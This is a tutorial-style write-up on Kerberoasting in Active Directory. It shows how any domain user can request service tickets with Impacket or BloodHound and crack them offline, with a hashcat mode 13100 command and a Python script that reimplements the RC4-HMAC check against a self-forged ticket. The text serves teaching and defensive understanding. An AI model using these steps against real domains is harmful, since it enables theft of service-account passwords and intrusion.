Kerberoasting
Kerberoasting is a technique in which an attacker requests service tickets (KRB_TGS tickets) for accounts that have a service principal name (SPN) registered and cracks them offline to recover the service account's password. The encrypted part of a service ticket is encrypted with the long-term key of the service account; when the RC4-HMAC encryption type (etype 23) is used, that key is the account's NT hash, so every password guess can be turned into a key and tested against the ticket. The KDC issues a TGS ticket to any authenticated domain user who asks for a registered SPN, without checking whether that user is authorized to use the service; authorization is left to the service itself. An attacker therefore needs only a valid ticket-granting ticket (TGT), obtained with any domain credential, to request tickets for every SPN in the domain, or can sniff TGS tickets from network traffic, and then brute force them offline. Tickets issued with the AES encryption types (etypes 17 and 18) are far slower to crack, and machine accounts have long random passwords, so the worthwhile targets are user accounts with an SPN and a human-chosen password.
Enumeration
Impacket
To execute a Kerberoasting attack we need a valid credential for any authenticated domain user, which in this case is usman:uPassword@123. We use GetUserSPNs.py from Impacket to enumerate the accounts with registered SPNs and request a TGS ticket for each of them.
The TGS tickets are retrieved from the domain controller and saved to a file in the $krb5tgs$ format that hashcat understands.
BloodHound
We can get the same result with BloodHound, whose built-in queries list the accounts that have an SPN as Kerberoastable.
Exploitation
With the TGS tickets retrieved, we can proceed to crack them using hashcat. Mode 13100 is the Kerberos 5 TGS-REP etype 23 (RC4-HMAC) mode, which matches the $krb5tgs$23$ lines written by GetUserSPNs.py; attack mode 0 is a straight wordlist attack.
hashcat -a 0 -m 13100 [TGS] [wordlist]
Great! We were able to crack them.
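To make clear what hashcat is actually testing in mode 13100, the following is an added example, not code from the original write-up or from Impacket or hashcat. It reimplements the RFC 4757 RC4-HMAC check in pure Python: a candidate password is turned into an NT hash (MD4 of the UTF-16LE password), the usage-2 keys K1 and K3 are derived, the ticket's encrypted part is decrypted and the HMAC-MD5 checksum is verified. Because a real ticket cannot be fetched offline, the script forges its own $krb5tgs$23$ line with a known service password; the account name svc_sql, the realm CORP.LOCAL, the SPN, the password Summer2024! and the small wordlist are all made up for the example.

```python
"""Offline check of a Kerberoasted RC4-HMAC (etype 23) ticket, as hashcat -m 13100 does it.
Added example: the ticket is constructed here with a known password; a real one
comes from GetUserSPNs.py. All names/passwords below are hypothetical."""
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often unavailable under OpenSSL 3."""
    mask = 0xFFFFFFFF
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for f, k, order, shifts in rounds:
            for j, i in enumerate(order):
                a = rol((a + f(b, c, d) + X[i] + k) & mask, shifts[j % 4])
                a, b, c, d = d, a, b, c  # rotate registers so each step works on "a"
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)): the RC4-HMAC long-term key of an AD account."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


# RFC 4757 "T": key usage 2 = ticket enc-part encrypted under the service key.
KEY_USAGE_TICKET = struct.pack("<I", 2)


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes):
    """RFC 4757 encryption; returns (checksum, ciphertext) as stored in the ticket."""
    k1 = hmac_md5(key, KEY_USAGE_TICKET)        # K1 = HMAC(K, T); K2 = K1 for 128-bit keys
    checksum = hmac_md5(k1, confounder + plaintext)
    k3 = hmac_md5(k1, checksum)
    return checksum, rc4(k3, confounder + plaintext)


def forge_ticket_line(service_password: str, user: str, realm: str, spn: str) -> str:
    """Build a $krb5tgs$23$ line like GetUserSPNs.py writes (constructed test data)."""
    plaintext = b"constructed EncTicketPart placeholder"   # real tickets carry DER EncTicketPart
    confounder = b"\x01\x02\x03\x04\x05\x06\x07\x08"        # random in real tickets; fixed here
    checksum, ct = rc4_hmac_encrypt(nt_hash(service_password), plaintext, confounder)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${ct.hex()}"


def check_candidate(line: str, candidate: str) -> bool:
    """The hashcat -m 13100 test: does this password reproduce the ticket's HMAC?"""
    checksum_hex, ct_hex = line.rsplit("$", 2)[1:]
    checksum, ct = bytes.fromhex(checksum_hex), bytes.fromhex(ct_hex)
    k1 = hmac_md5(nt_hash(candidate), KEY_USAGE_TICKET)
    k3 = hmac_md5(k1, checksum)
    decrypted = rc4(k3, ct)                      # confounder || EncTicketPart if the key is right
    return hmac.compare_digest(hmac_md5(k1, decrypted), checksum)


def crack(line: str, wordlist):
    """Straight wordlist attack (hashcat -a 0): first candidate whose HMAC verifies, else None."""
    for word in wordlist:
        if check_candidate(line, word):
            return word
    return None


if __name__ == "__main__":
    line = forge_ticket_line("Summer2024!", "svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433")
    print(line)
    print("cracked:", crack(line, ["password", "Welcome1", "Summer2024!"]))
```

The cost per guess is one MD4, three HMAC-MD5 computations and one RC4 pass, which is why RC4 tickets crack at hundreds of millions of guesses per second on a GPU; the AES modes (19600/19700) need PBKDF2 with 4096 iterations per guess, so an account that only issues AES tickets is a much poorer target.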